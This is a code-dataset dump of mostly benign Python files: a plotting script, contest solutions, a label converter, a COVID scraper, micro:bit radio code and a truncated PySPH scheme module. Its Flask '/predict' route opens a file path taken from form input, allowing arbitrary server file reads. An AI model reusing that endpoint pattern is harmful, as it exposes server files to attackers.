seq_id stringlengths 4 11 | text stringlengths 113 2.92M | repo_name stringlengths 4 125 ⌀ | sub_path stringlengths 3 214 | file_name stringlengths 3 160 | file_ext stringclasses 18
values | file_size_in_byte int64 113 2.92M | program_lang stringclasses 1
value | lang stringclasses 93
values | doc_type stringclasses 1
value | stars int64 0 179k ⌀ | dataset stringclasses 3
values | pt stringclasses 78
values |
|---|---|---|---|---|---|---|---|---|---|---|---|---|
12078215414 | import os
import yaml
import argparse
import torch
import matplotlib.pyplot as plt
from omegaconf import OmegaConf
from bayes_dip.data.datasets.walnut import get_walnut_2d_inner_part_defined_by_patch_size
from bayes_dip.utils.evaluation_utils import get_abs_diff, get_ground_truth, get_stddev, translate_path
from bayes_dip.utils.plot_utils import configure_matplotlib, plot_image, add_inset
# --- Command-line interface -------------------------------------------------
parser = argparse.ArgumentParser()
parser.add_argument('--runs_file', type=str, default='runs_walnut_sample_based_density.yaml', help='path of yaml file containing hydra output directory names')
parser.add_argument('--experiments_outputs_path', type=str, default='../experiments/outputs', help='base path containing the hydra output directories (usually "[...]/outputs/")')
parser.add_argument('--experiments_multirun_path', type=str, default='../experiments/multirun', help='base path containing the hydra multirun directories (usually "[...]/multirun/")')
parser.add_argument('--do_not_use_predcp', action='store_true', default=False, help='use the run without PredCP (i.e., use MLL instead of TV-MAP)')
parser.add_argument('--include_outer_part', action='store_true', default=False, help='include the outer part of the walnut image (that only contains background)')
parser.add_argument('--define_inner_part_by_patch_size', type=int, default=1, help='patch size defining the effective inner part (due to not necessarily aligned patches)')
parser.add_argument('--do_not_subtract_image_noise_correction', action='store_true', default=False, help='do not subtract the image noise correction term (if any) from the covariance diagonals')
parser.add_argument('--save_data_to', type=str, default='', help='path to cache the plot data, such that they can be loaded with --load_data_from')
parser.add_argument('--load_data_from', type=str, default='', help='load data cached from a previous run with --save_data_to')
args = parser.parse_args()
# Base paths handed to translate_path() for resolving hydra run directories.
experiment_paths = {
    'outputs_path': args.experiments_outputs_path,
    'multirun_path': args.experiments_multirun_path,
}
# Maps run labels (e.g. 'include_predcp_False') to hydra run directory names.
with open(args.runs_file, 'r') as f:
    runs = yaml.safe_load(f)
def collect_walnut_mini_figure_data(args, runs):
    """Gather the images needed for the walnut mini figure.

    Returns a dict with the ground truth, the absolute reconstruction
    error, the predictive std-dev (with NaNs outside the evaluated part),
    the corresponding boolean mask and the slices selecting the inner
    walnut region.
    """
    # The DIP-MLL optimisation run that the density run was based on.
    hydra_cfg = OmegaConf.load(os.path.join(
        translate_path(runs['include_predcp_False'],
                       experiment_paths=experiment_paths),
        '.hydra', 'config.yaml'))
    dip_mll_optim_run = hydra_cfg.inference.load_path

    common_kwargs = dict(sample_idx=0, experiment_paths=experiment_paths)
    stddev_kwargs = dict(
        patch_idx_list=None if args.include_outer_part else 'walnut_inner',
        subtract_image_noise_correction_if_any=(
            not args.do_not_subtract_image_noise_correction),
    )

    data = {'ground_truth': get_ground_truth(dip_mll_optim_run, **common_kwargs)}
    print('collecting bayes_dip data')
    data['abs_diff'] = get_abs_diff(dip_mll_optim_run, **common_kwargs)
    data['stddev'] = get_stddev(
        runs[f'include_predcp_{not args.do_not_use_predcp}'],
        **common_kwargs, **stddev_kwargs)
    # NaNs in the std-dev mark pixels outside the evaluated (inner) part.
    data['mask'] = torch.logical_not(torch.isnan(data['stddev']))
    print(f'Using {data["mask"].sum()} pixels.')

    if args.include_outer_part:
        slice_0 = slice(0, data['ground_truth'].shape[0])
        slice_1 = slice(0, data['ground_truth'].shape[1])
    else:
        slice_0, slice_1 = get_walnut_2d_inner_part_defined_by_patch_size(
            args.define_inner_part_by_patch_size)
    # Sanity check: the mask must exactly cover the selected rectangle.
    assert data['mask'].sum() == (
        (slice_0.stop - slice_0.start) * (slice_1.stop - slice_1.start))
    data['slice_0'], data['slice_1'] = slice_0, slice_1
    return data
# Load cached plot data if requested, otherwise collect it (and optionally
# cache it for later runs).
if args.load_data_from:
    print(f'loading data from {args.load_data_from}')
    data = torch.load(args.load_data_from)
else:
    data = collect_walnut_mini_figure_data(args, runs)
    if args.save_data_to:
        print(f'saving data to {args.save_data_to}')
        torch.save(data, args.save_data_to)
configure_matplotlib()
# Left half: ground truth; right half is reserved for the two insets.
fig, ax = plt.subplots(figsize=(4.5, 2.25), gridspec_kw={'left': 0., 'right': 0.5})
ground_truth = data['ground_truth']
abs_diff = data['abs_diff']
# nan parts black
stddev = data['stddev'].clone()
stddev[torch.logical_not(data['mask'])] = 0.
slice_0, slice_1 = data['slice_0'], data['slice_1']
plot_image(fig, ax, ground_truth[slice_0, slice_1], vmin=0.)
# Zoom rectangle [x, y, w, h] in cropped-image coordinates.
# NOTE(review): both offsets subtract slice_0.start -- presumably the
# second should be 230 - slice_1.start; confirm against the inner slices.
rect = [240-slice_0.start, 230-slice_0.start, 52, 104]
# Two insets stacked to the right: absolute error (top) and std-dev (bottom).
ax_abs_error = add_inset(fig, ax, abs_diff[slice_0, slice_1], [1.01, 0.505, 0.99, 0.495], rect, vmin=None, vmax=None, interpolation='none', frame_color='#aa0000', frame_path=[[0., 1.], [0., 0.], [1., 0.], [1., 1.], [0., 1.]], clip_path_closing=[], mark_in_orig=True)
ax_std = add_inset(fig, ax, stddev[slice_0, slice_1], [1.01, 0., 0.99, 0.495], rect, vmin=None, vmax=None, interpolation='none', frame_color='#aa0000', frame_path=[[0., 1.], [0., 0.], [1., 0.], [1., 1.], [0., 1.]], clip_path_closing=[], mark_in_orig=False)
# Twin axes exist only to place right-hand-side y-labels on the insets.
ax_abs_error_twin = ax_abs_error.twinx()
ax_std_twin = ax_std.twinx()
ax_abs_error_twin.set_xticks([])
ax_abs_error_twin.set_yticks([])
ax_std_twin.set_xticks([])
ax_std_twin.set_yticks([])
# Hide all axes frames.
for spine in ax.spines.values():
    spine.set_visible(False)
for spine in ax_abs_error_twin.spines.values():
    spine.set_visible(False)
for spine in ax_std_twin.spines.values():
    spine.set_visible(False)
ax.set_ylabel('original image', labelpad=2)
ax_abs_error_twin.set_ylabel('error', rotation=-90, labelpad=9)
ax_std_twin.set_ylabel('std-dev', rotation=-90, labelpad=9)
fig.savefig(f'walnut_mini_include_predcp_{not args.do_not_use_predcp}.pdf', bbox_inches='tight', pad_inches=0.)
fig.savefig(f'walnut_mini_include_predcp_{not args.do_not_use_predcp}.png', bbox_inches='tight', pad_inches=0., dpi=600)
| educating-dip/bayes_dip | evaluation/plot_walnut_mini.py | plot_walnut_mini.py | py | 5,646 | python | en | code | 2 | github-code | 90 |
17986940379 | n = int(input())
a = list(map(int, input().split()))
# arr[0..7]: flags for the eight fixed colour bands (rating // 400);
# arr[8]: count of users rated >= 3200, who may pick any colour.
arr = [0] * 9
ans = [0] * 2
for i in a:
    if i//400 < 8:
        arr[i//400] = 1
    else:
        arr[8] += 1
left = sum(arr[:8])   # number of distinct fixed colours present
right = arr[8]        # number of free-choice users
ans[0] = left         # minimum distinct colours
# Even if every user is free-choice, at least one colour is used.
if left == 0:
    ans[0] = 1
# Maximum: each free-choice user picks a brand-new colour.
ans[1] = left + right
print(*ans)
42425644094 | """
https://www.codechef.com/problems/GDTURN
"""
if __name__ == "__main__":
    # For each dice roll (two face values), print YES iff the sum exceeds 6.
    n = int(input())
    dice = [list(map(int, input().split())) for _ in range(n)]
    for roll in dice:
        # Renamed from 'sum' to 'total': the original shadowed the builtin.
        total = roll[0] + roll[1]
        if total > 6:
            print("YES")
        else:
            print("NO")
| vijay2930/HackerrankAndLeetcode | com/codechef/GoodTurn.py | GoodTurn.py | py | 301 | python | en | code | 0 | github-code | 90 |
27335828252 | import time
import numpy as np
import pandas as pd
import csv
from collections import defaultdict
import json
import os
import xlrd
# Paths to the Open Images metadata/label csv files (local Windows layout).
label_map_path = "D:\\open_images\\4metadata\\oidv6-class-descriptions.csv"
train_label_path = "D:\\open_images\\1human\\oidv6-train-annotations-human-imagelabels.csv"
# train_json_file = "D:\\open_images\\1human\\oidv6-train-annotations-human-imagelabels.json"
val_label_path = "D:\\open_images\\1human\\validation-annotations-human-imagelabels.csv"
# val_json_file = "D:\\open_images\\1human\\validation-annotations-human-imagelabels.json"
test_label_path = "D:\\open_images\\1human\\test-annotations-human-imagelabels.csv"
# test_json_file = "D:\\open_images\\1human\\test-annotations-human-imagelabels.json"
json_hierarchy_file = "D:\\open_images\\bbox_labels_600_hierarchy.json"
# get label_id_to_name dict
# Build the mapping from machine label ids (e.g. '/m/01g317') to
# human-readable display names from the class-descriptions csv.
df = pd.read_csv(label_map_path)
label_ids = np.array(df['LabelName'])
label_names = np.array(df['DisplayName'])
label_id_to_name = dict()
for idx, (label_id, label_name) in enumerate(zip(label_ids, label_names)):
    label_id_to_name[label_id] = label_name
print("got label map dict")
def convert_json_hierarchy(hierarchy):
    """Recursively replace label ids with display names in the hierarchy.

    'LabelName' values found in the module-level ``label_id_to_name`` map
    are translated in place; lists are converted element-wise. The (same,
    mutated) object is returned.
    """
    if isinstance(hierarchy, dict):
        for key in hierarchy:
            value = hierarchy[key]
            if key == "LabelName":
                if value in label_id_to_name:
                    hierarchy[key] = label_id_to_name[value]
            elif isinstance(value, list):
                hierarchy[key] = convert_json_hierarchy(value)
    elif isinstance(hierarchy, list):
        hierarchy[:] = [convert_json_hierarchy(item) for item in hierarchy]
    return hierarchy
# stat label hierarchy file
# json_hierarchy = json.load(open(json_hierarchy_file))
# json_hierarchy_name = convert_json_hierarchy(json_hierarchy)
# json.dump(json_hierarchy_name, open("D:\\open_images\\bbox_labels_600_hierarchy.name.json", "w"))
def convert_label_to_json(label_path, use_cls_map=None):
    """Convert human-verified image labels from csv to json.

    Writes next to ``label_path``:

    * ``<name>.json``     -- image id -> list of positive label names
    * ``<name>_cls.json`` -- image id -> 135-dim binary class vector
      (only written when ``use_cls_map`` is given)

    Parameters
    ----------
    label_path : str
        csv file with ImageID / LabelName / Confidence columns.
    use_cls_map : str, optional
        xlsx workbook whose second sheet maps label ids (column 2) to the
        coarse class indices 1..134; index 0 means "any label present".

    Fixes vs. the original: ``imgs_cls`` is no longer referenced (NameError)
    when ``use_cls_map`` is None, file handles are closed via ``with``, and
    the bare ``except`` is narrowed to the ``ValueError`` that
    ``list.index`` raises for unmapped labels.
    """
    print("[+] processing {}".format(label_path))
    start_t = time.time()
    df = pd.read_csv(label_path)
    image_ids = np.array(df['ImageID'])
    label_names = np.array(df['LabelName'])
    confidences = np.array(df['Confidence']) > 0
    valid_image_ids = image_ids[confidences]
    valid_label_ids = label_names[confidences]

    imgs_label = defaultdict(list)
    imgs_cls = None
    cls_list = None
    if use_cls_map is not None:
        imgs_cls = defaultdict(lambda: [0] * 135)
        wb = xlrd.open_workbook(use_cls_map)
        names_sheet = wb.sheets()[1]
        cls_list = names_sheet.col_values(2)
        cls_list.insert(0, "any")
        print("[+] loaded cls map list")

    for image_id, label_id in zip(valid_image_ids, valid_label_ids):
        imgs_label[image_id].append(label_id_to_name[label_id])
        if imgs_cls is not None:
            try:
                mapped_cls_idx = cls_list.index(label_id)
            except ValueError:
                # label not part of the coarse class map
                continue
            imgs_cls[image_id][mapped_cls_idx] = 1
            imgs_cls[image_id][0] = 1

    del image_ids, label_names, confidences, valid_image_ids, valid_label_ids
    print("got img label list, use time {}".format(time.time() - start_t))

    json_file = os.path.splitext(label_path)[0] + ".json"
    with open(json_file, "w") as f:
        json.dump(imgs_label, f)
    if imgs_cls is not None:
        cls_json_file = os.path.splitext(label_path)[0] + "_cls.json"
        with open(cls_json_file, "w") as f:
            json.dump(imgs_cls, f)
    del imgs_label, imgs_cls
    print("saved")

    # Reload to verify the written json and report the round-trip time.
    start_t = time.time()
    with open(json_file) as f:
        imgs_label = json.load(f)
    print("reload img label list, use time {}".format(time.time() - start_t))
# Convert all three splits; the xlsx stat file derived from the test split
# is reused as the coarse class map for every split.
convert_label_to_json(test_label_path, use_cls_map="D:\\open_images\\1human\\test-annotations-human-imagelabels.csv.stat.xlsx")
convert_label_to_json(val_label_path, use_cls_map="D:\\open_images\\1human\\test-annotations-human-imagelabels.csv.stat.xlsx")
convert_label_to_json(train_label_path, use_cls_map="D:\\open_images\\1human\\test-annotations-human-imagelabels.csv.stat.xlsx")
print("done")
| litianqi715/demo_ml | experimental/on_open_images_v6/convert_train_label.py | convert_train_label.py | py | 4,059 | python | en | code | 0 | github-code | 90 |
71252908136 | from colorama import Fore, init
init(autoreset=True)
from pandas import read_html
from path import path
url = "https://www.nytimes.com/interactive/2021/world/india-covid-cases.html"
# read_html returns every <table> on the page; table index 1 holds the
# state-wise figures. Columns 0,1,2,4,5 are kept and cached to csv.
# NOTE: the fetch happens at import time, so importing this module hits
# the network.
d = read_html(url)
d[1].iloc[:,[0,1,2,4,5]].to_csv(path+"csv/current_covid_cases_deaths_india.csv")
def table():
    # Print the fetched state-wise table to the console.
    print(f"{Fore.CYAN}\nCoronavirus in India - The NewYork Times\n")
    print(d[1].iloc[:,[0,1,2,4,5]])
if __name__ == "__main__":
    table()
| SinghIsWriting/companion | covid_cases.py | covid_cases.py | py | 437 | python | en | code | 1 | github-code | 90 |
2019024979 | from flask import Flask, request, render_template
import pandas as pd
from models.model import preprocessing
from models.predict import predict_value
app = Flask(__name__)
@app.route('/', methods=["GET", "POST"])
def index():
    """Serve the upload form."""
    return render_template("index.html")
@app.route('/predict', methods = ['GET', 'POST'])
def data():
    """Run the model on the csv path submitted by the form and return the
    predictions rendered as an HTML table.

    NOTE(review): GET requests fall through and return None, which Flask
    treats as an error -- presumably only POST is expected; confirm.
    """
    if request.method == 'POST':
        # SECURITY NOTE(review): 'csvfile' is a user-supplied *path* opened
        # directly on the server, which permits reading arbitrary files
        # (path traversal). Consider request.files with an actual upload;
        # verify against the form template before changing.
        f = request.form['csvfile']
        with open(f) as file:
            test_data = pd.read_csv(file)
        # preprocessing from the function imported from model
        features_test = preprocessing(test_data)
        # predicting the value from function imported from predict
        pred_ = predict_value(features_test, test_data)
        pred_table = pred_.to_html()
        return pred_table
if __name__ == "__main__":
    app.run(debug=True)
12041911258 | class SENSOR:
STATION=0
LIGHT=1
COMPASS=2
TEMPER=3
ROLL=4
PITCH=5
ACCX=6
ACCY=7
ACCZ=8
ROTX=9
ROTY=10
ROTZ=11
MAGX=12
MAGY=13
MAGZ=14
stationID = 0  # 0 = server role; 1..25 = client station id
basic.show_number(0)
# Last RSSI received from each station, mapped to 1..255; 0 = no ACK yet.
# (range(...).fill(...) is the MakeCode array API, not CPython.)
stationACK = range(26).fill(0)
radio.set_group(79)
radio.set_transmit_power(7)
# CLIENT: SETUP DATA STRUCTURE
# 19-byte sensor payload, indexed by the SENSOR.* constants above.
dataBuffer = bytearray(19)
dataBuffer.fill(0)
##### SETUP #####
def on_button_pressed_b():
    """Button B cycles this device's station id through 0..25 (0 = server)."""
    global stationID
    stationID = (stationID + 1) % 26
    drawStationID()
input.on_button_pressed(Button.B, on_button_pressed_b)
##### SERVER #####
##### SEND SYNC REQ #####
def on_button_pressed_ab():
    """Server only: broadcast SYNC to every station id and collect ACKs."""
    global stationID, stationACK
    #ASKING FOR RE-SYNC. OLD RSSI VALUES IGNORED
    if stationID == 0:
        for i in range(1,26):
            drawUpToNumber(i)
            print ("asking for SYNC station "+str(i))
            stationACK[i] = 0 # reset the last RSSI. This may change async during the loop below
            for j in range(10):
                if stationACK[i] == 0: #if station didn't reply yet keep sending
                    radio.send_value("SYNC", i)
                basic.pause(10+randint(1,5)*7)
            basic.clear_screen()
        drawClientMap()
input.on_button_pressed(Button.AB, on_button_pressed_ab)
### SERVER: DUMP THE stationACKs
def on_button_pressed_a():
    """Server: dump every non-zero stationACK entry as a dB RSSI value."""
    global stationACK
    lack = 26
    for i in range(1,lack):
        if stationACK[i]!=0:
            # map the stored 1..255 value back to the raw -128..-42 dB range
            print("Station "+str(i)+" ACK: "+ str(Math.map(stationACK[i],1,255,-128,-42)))
            basic.pause(100)
    drawClientMap()
input.on_button_pressed(Button.A, on_button_pressed_a)
##### CLIENT/SERVER: ACCEPTING REQ #####
def on_received_value(name, value):
    """Radio dispatcher for both roles.

    Server (stationID == 0): record the RSSI of incoming 'ACK' messages.
    Client: answer 'SYNC' with repeated 'ACK's, and 'DATARQ<n>' with the
    sensor data buffer; the repetition count is derived from the RSSI.
    """
    global stationID, stationACK, dataBuffer
    if stationID == 0: #SERVER: accept the ACK command
        if name == "ACK":
            # NOTE(review): 'value > 0 & value <= 25' parses around the
            # bitwise (0 & value) and effectively checks only 'value > 0';
            # likely intended 'value > 0 and value <= 25'.
            if value > 0 & value <= 25:
                stationACK[value] = Math.map(getRSSI(),-128,-42,1,255)
                print("station "+str(value)+" has RSSI: "+getRSSI()+" ("+stationACK[value]+")")
                drawClientMap()
    elif name=="SYNC": #CLIENT reply with ACK several times
        tries = triesFromRSSI(getRSSI(),0.95,9) # MAXIMUM 9 TRIES
        print("sending ACK "+str(tries)+" times")
        if value == stationID: ### REPLY ONLY IF WE HAVE A MATCHING STATIONID
            for i in range(tries): ### tries ARE CALC'd WITH 95% RELIABILITY TARGET
                radio.send_value("ACK",stationID)
                drawUpToNumber(tries-i)
                basic.pause(randint(1, 10)*100)
            basic.clear_screen()
            drawStationID()
    else:
        if name[0:6]=="DATARQ": #CLIENT: SEND DATA ARRAY BACK TO SERVER
            statID = int(name[6:])
            if statID==stationID: #CLIENT: ARE WE THE STATION BEING ASKED?
                tries = triesFromRSSI(getRSSI(), 0.95, 9)
                print("sending DATA "+str(tries)+ " times")
                # Fill the shared payload with the current sensor readings,
                # scaled into single-byte ranges via Math.map.
                dataBuffer[SENSOR.STATION] = stationID
                dataBuffer[SENSOR.LIGHT]=input.light_level()
                dataBuffer[SENSOR.TEMPER]=input.temperature()
                dataBuffer[SENSOR.COMPASS]=Math.map(input.compass_heading(),0,359,0,255)
                dataBuffer[SENSOR.PITCH]=Math.map(input.rotation(Rotation.PITCH),-180,180,0,255)
                dataBuffer[SENSOR.ROLL]=Math.map(input.rotation(Rotation.ROLL),-180,180,0,255)
                magx = Math.round(Math.constrain(input.magnetic_force(Dimension.X),-127,127))
                dataBuffer[SENSOR.MAGX]=Math.map(magx,-127,127,0,255)
                for i in range(tries):
                    radio.send_buffer(dataBuffer)
                    drawUpToNumber(tries-i-1) # SHOW HOW MANY TRIES ARE LEFT
                    basic.pause(randint(1,5)*100)
radio.on_received_value(on_received_value)
#SERVER: RECEIVED DATA ARRAY FROM CLIENT
def on_received_buffer(receivedBuffer):
    """Server: print the sensor payload received from a client, mapping the
    byte-scaled values back to their physical ranges."""
    print("Recv'd data from stat "+str(receivedBuffer[0]))
    print("Light: "+str(receivedBuffer[SENSOR.LIGHT]))
    print("Temp: "+str(receivedBuffer[SENSOR.TEMPER]))
    print("Compass: "+str(Math.map(receivedBuffer[SENSOR.COMPASS],0,255,0,359)))
    print("Pitch: "+str(Math.map(receivedBuffer[SENSOR.PITCH],0,255,-180,180)))
    print("Roll: "+str(Math.map(receivedBuffer[SENSOR.ROLL],0,255,-180,180)))
radio.on_received_buffer(on_received_buffer)
#SERVER: ASKING A CLIENT FOR DATA ARRAY
def on_pin_pressed_p0():
    """Server: request the data array from the hard-coded station 14."""
    global stationID
    if stationID == 0:
        # CALCULATE TRIES BASED ON PREVIOUS RSSI FROM THIS CLIENT
        # THE STATIONACK ARRAY HOLDS THE LAST RSSI FROM THIS CLIENT
        # WE'RE SCALING THE RSSI FROM -128dB TO -42dB TO 1-255 RANGE AND BACK
        tries = triesFromRSSI(Math.map(stationACK[14],1,255,-128,-42),0.95,9)
        print("asking for DATA "+ str(tries)+ " times")
        for i in range(tries):
            radio.send_value("DATARQ14", 0)
            basic.pause(randint(1,5)*50)
            # NOTE(review): 'tries % 2' is constant within the loop, so the
            # LED does not actually blink -- presumably 'i % 2' was meant.
            drawSingleNumber(14,255*(tries%2))
        basic.clear_screen()
input.on_pin_pressed(TouchPin.P0, on_pin_pressed_p0)
##### UTILITIES #####
##### SERVER: DRAW CLIENT MAP #####
def drawClientMap():
    """Show one LED per station id: dim (10) = never ACKed, bright (255) = ACKed."""
    global stationACK
    lack = 26
    basic.clear_screen()
    for i in range(1,lack):
        if stationACK[i]==0:
            drawSingleNumber(i,10)
        else:
            drawSingleNumber(i,255)
##### DRAW A NUMBER WITH LEDS #####
def drawUpToNumber(n: number):
    """Light the first n LEDs in row-major order; sad face if out of range.

    Fix: the original guard 'n>=0 & n<=25' parses around the bitwise
    (0 & n) and effectively checked only 'n >= 0', so out-of-range values
    reached led.plot.
    """
    basic.clear_screen()
    if 0 <= n <= 25:
        for i in range(n):
            led.plot(i % 5, i // 5)
    else:
        basic.show_icon(IconNames.SAD)

def drawSingleNumber(n: number, intensity: number):
    """Light the LED for station n (1..25) at the given brightness."""
    n = n - 1
    # Same '&' -> chained-comparison fix as above; after the shift the valid
    # LED index range on the 5x5 grid is 0..24 (the original also allowed 25).
    if 0 <= n <= 24:
        led.plot_brightness(n % 5, n // 5, intensity)
    else:
        basic.show_icon(IconNames.SAD)
##### CLIENT/SERVER: DRAW STATIONID USING LEDS #####
def drawStationID():
    """Show the current station id: LED count for ids above 9, a digit otherwise."""
    global stationID
    if stationID > 9:
        drawUpToNumber(stationID)
    else:
        basic.show_number(stationID)
    pass
def getRSSI():
    # Signal strength (dB) of the most recently received packet.
    return radio.received_packet(RadioPacketProperty.SIGNAL_STRENGTH)
def triesN(y,p):
    # Sends needed to reach success probability y when a single send is
    # lost with probability p: ceil(log(1-y)/log(p)).
    return Math.ceil(Math.log(1-y)/Math.log(p))
def lossP(y,n):
    # Inverse of triesN: per-send loss probability implied by reaching
    # target y within n tries.
    return Math.pow((1-y),1/n)
def triesFromRSSI(rssi: float, y:float, maxtries: int):
    """Estimate how many resends are needed at the given RSSI to reach
    reliability target y, capped at maxtries (empirical loss model)."""
    rssi2 = rssi + 100
    p = Math.min(1,5936.2673*rssi2**(-3.7231)) # this function may return a p > 1
    # so we limit it to 1
    if p==1:
        t = maxtries
    else:
        t = Math.max(1,triesN(y,p)) #if tries fall below 1, at least 1 try
    return t
#drawNumber(19)
#drawSingleNumber(1,255)
#drawSingleNumber(5,255)
#drawSingleNumber(21,255)
#drawSingleNumber(25,255)
#strt = "DATARQ14"
#print(strt[6:])
| tsiozos/test-remote-sensing-rssi-with-ack | main.py | main.py | py | 6,675 | python | en | code | 0 | github-code | 90 |
18356462833 | """Abstract class to define the API for an SPH scheme. The idea is that
one can define a scheme and thereafter one simply instantiates a suitable
scheme, gives it a bunch of particles and runs the application.
"""
class Scheme(object):
    """An API for an SPH scheme.
    """
    def __init__(self, fluids, solids, dim):
        """
        Parameters
        ----------

        fluids: list
            List of names of fluid particle arrays.
        solids: list
            List of names of solid particle arrays (or boundaries).
        dim: int
            Dimensionality of the problem.
        """
        self.fluids = fluids
        self.solids = solids
        self.dim = dim
        self.solver = None
        self.attributes_changed()

    # Public protocol ###################################################
    def add_user_options(self, group):
        # Hook: subclasses add their command-line options to ``group``.
        pass

    def attributes_changed(self):
        """Overload this to compute any properties that depend on others.

        This is automatically called when configure is called.
        """
        pass

    def configure(self, **kw):
        """Configure the scheme with given parameters.

        Overload this to do any scheme specific stuff.
        """
        for k, v in kw.items():
            # Only already-declared attributes may be configured.
            if not hasattr(self, k):
                msg = 'Parameter {param} not defined for {scheme}.'.format(
                    param=k, scheme=self.__class__.__name__
                )
                raise RuntimeError(msg)
            setattr(self, k, v)
        self.attributes_changed()

    def consume_user_options(self, options):
        # Hook: subclasses read back the parsed command-line ``options``.
        pass

    def configure_solver(self, kernel=None, integrator_cls=None,
                         extra_steppers=None, **kw):
        """Configure the solver to be generated.

        Parameters
        ----------

        kernel : Kernel instance.
            Kernel to use, if none is passed a default one is used.

        integrator_cls : pysph.sph.integrator.Integrator
            Integrator class to use, use sensible default if none is
            passed.

        extra_steppers : dict
            Additional integration stepper instances as a dict.

        **kw : extra arguments
            Any additional keyword args are passed to the solver instance.
        """
        raise NotImplementedError()

    def get_equations(self):
        # Subclasses return the list of equation Groups for the scheme.
        raise NotImplementedError()

    def get_solver(self):
        # Returns the solver created by configure_solver (None before that).
        return self.solver

    def setup_properties(self, particles, clean=True):
        """Setup the particle arrays so they have the right set of properties
        for this scheme.

        Parameters
        ----------

        particles : list
            List of particle arrays.

        clean : bool
            If True, removes any unnecessary properties.
        """
        raise NotImplementedError()

    # Private protocol ###################################################
    def _ensure_properties(self, pa, desired_props, clean=True):
        """Given a particle array and a set of properties desired,
        this removes unnecessary properties (if `clean=True`), and
        adds the desired properties.

        Parameters
        ----------

        pa : ParticleArray
            Desired particle array.
        desired_props : sequence
            Desired properties to have in the array, can be a list of strings
            or dicts with stride info or both.
        clean : bool
            Remove undesirable properties.
        """
        # Normalize the mixed list of names/dicts into {name: spec}.
        all_props = {}
        for p in desired_props:
            if isinstance(p, dict):
                all_props.update({p['name']: p})
            elif p not in all_props:
                all_props.update({p: {'name': p}})

        pa_props = set(pa.properties.keys())
        if clean:
            to_remove = pa_props - set(all_props.keys())
            for prop in to_remove:
                pa.remove_property(prop)

        to_add = set(all_props.keys()) - pa_props
        for prop in to_add:
            pa.add_property(**all_props[prop])

    def _smart_getattr(self, obj, var):
        # Prefer the value on ``obj`` (e.g. parsed options); fall back to
        # the scheme's own attribute when it is None.
        res = getattr(obj, var)
        if res is None:
            return getattr(self, var)
        else:
            return res
class SchemeChooser(Scheme):
    """Delegating scheme that lets the user pick one of several schemes
    via the ``--scheme`` command-line option."""
    def __init__(self, default, **schemes):
        """
        Parameters
        ----------

        default: str
            Name of the default scheme to use.
        **schemes: kwargs
            The schemes to choose between.
        """
        self.default = default
        self.schemes = dict(schemes)
        self.scheme = schemes[default]

    def add_user_options(self, group):
        # Expose the options of every candidate scheme plus --scheme itself.
        for scheme in self.schemes.values():
            scheme.add_user_options(group)
        choices = list(self.schemes.keys())
        group.add_argument(
            "--scheme", action="store", dest="scheme",
            default=self.default, choices=choices,
            help="Specify scheme to use (one of %s)." % choices
        )

    def attributes_changed(self):
        self.scheme.attributes_changed()

    def configure(self, **kw):
        self.scheme.configure(**kw)

    def consume_user_options(self, options):
        # Switch to the user-selected scheme, then let it consume its options.
        self.scheme = self.schemes[options.scheme]
        self.scheme.consume_user_options(options)

    def configure_solver(self, kernel=None, integrator_cls=None,
                         extra_steppers=None, **kw):
        self.scheme.configure_solver(
            kernel=kernel, integrator_cls=integrator_cls,
            extra_steppers=extra_steppers, **kw
        )

    def get_equations(self):
        return self.scheme.get_equations()

    def get_solver(self):
        return self.scheme.get_solver()

    def setup_properties(self, particles, clean=True):
        """Setup the particle arrays so they have the right set of properties
        for this scheme.

        Parameters
        ----------

        particles : list
            List of particle arrays.

        clean : bool
            If True, removes any unnecessary properties.
        """
        self.scheme.setup_properties(particles, clean)
############################################################################
def add_bool_argument(group, arg, dest, help, default):
    """Add a ``--arg`` / ``--no-arg`` boolean option pair to *group*.

    ``--arg`` stores True, ``--no-arg`` stores False, and *default* is
    used when neither flag is given. The negated flag's help text is the
    original with "Do not " prepended.
    """
    group.add_argument('--%s' % arg, action="store_true", dest=dest, help=help)
    negated_help = 'Do not ' + help[0].lower() + help[1:]
    group.add_argument(
        '--%s' % ('no-' + arg), action="store_false", dest=dest,
        help=negated_help
    )
    group.set_defaults(**{dest: default})
class WCSPHScheme(Scheme):
    """Weakly-compressible SPH scheme with optional delta-SPH,
    tensile-instability and Hughes-Graham corrections."""
    def __init__(self, fluids, solids, dim, rho0, c0, h0, hdx, gamma=7.0,
                 gx=0.0, gy=0.0, gz=0.0, alpha=0.1, beta=0.0, delta=0.1,
                 nu=0.0, tensile_correction=False, hg_correction=False,
                 update_h=False, delta_sph=False, summation_density=False):
        """Parameters
        ----------

        fluids: list
            List of names of fluid particle arrays.
        solids: list
            List of names of solid particle arrays (or boundaries).
        dim: int
            Dimensionality of the problem.
        rho0: float
            Reference density.
        c0: float
            Reference speed of sound.
        gamma: float
            Gamma for the equation of state.
        h0: float
            Reference smoothing length.
        hdx: float
            Ratio of h/dx.
        gx, gy, gz: float
            Body force acceleration components.
        alpha: float
            Coefficient for artificial viscosity.
        beta: float
            Coefficient for artificial viscosity.
        delta: float
            Coefficient used to control the intensity of diffusion of density
        nu: float
            Real viscosity of the fluid, defaults to no viscosity.
        tensile_correction: bool
            Use tensile correction.
        hg_correction: bool
            Use the Hughes-Graham correction.
        update_h: bool
            Update the smoothing length as per Ferrari et al.
        delta_sph: bool
            Use the delta-SPH correction terms.
        summation_density: bool
            Use summation density instead of continuity.

        References
        ----------

        .. [Hughes2010] J. P. Hughes and D. I. Graham, "Comparison of
           incompressible and weakly-compressible SPH models for free-surface
           water flows", Journal of Hydraulic Research, 48 (2010), pp. 105-117.

        .. [Marrone2011] S. Marrone et al., "delta-SPH model for simulating
           violent impact flows", Computer Methods in Applied Mechanics and
           Engineering, 200 (2011), pp 1526--1542.

        .. [Cherfils2012] J. M. Cherfils et al., "JOSEPHINE: A parallel SPH
           code for free-surface flows", Computer Physics Communications, 183
           (2012), pp 1468--1480.
        """
        self.fluids = fluids
        self.solids = solids
        self.solver = None
        self.rho0 = rho0
        self.c0 = c0
        self.gamma = gamma
        self.dim = dim
        self.h0 = h0
        self.hdx = hdx
        self.gx = gx
        self.gy = gy
        self.gz = gz
        self.alpha = alpha
        self.beta = beta
        self.delta = delta
        self.nu = nu
        self.tensile_correction = tensile_correction
        self.hg_correction = hg_correction
        self.update_h = update_h
        self.delta_sph = delta_sph
        self.summation_density = summation_density

    def add_user_options(self, group):
        # Command-line options for the tunable parameters; defaults of None
        # mean "keep the value passed to __init__" (see _smart_getattr).
        group.add_argument(
            "--alpha", action="store", type=float, dest="alpha",
            default=None,
            help="Alpha for the artificial viscosity."
        )
        group.add_argument(
            "--beta", action="store", type=float, dest="beta",
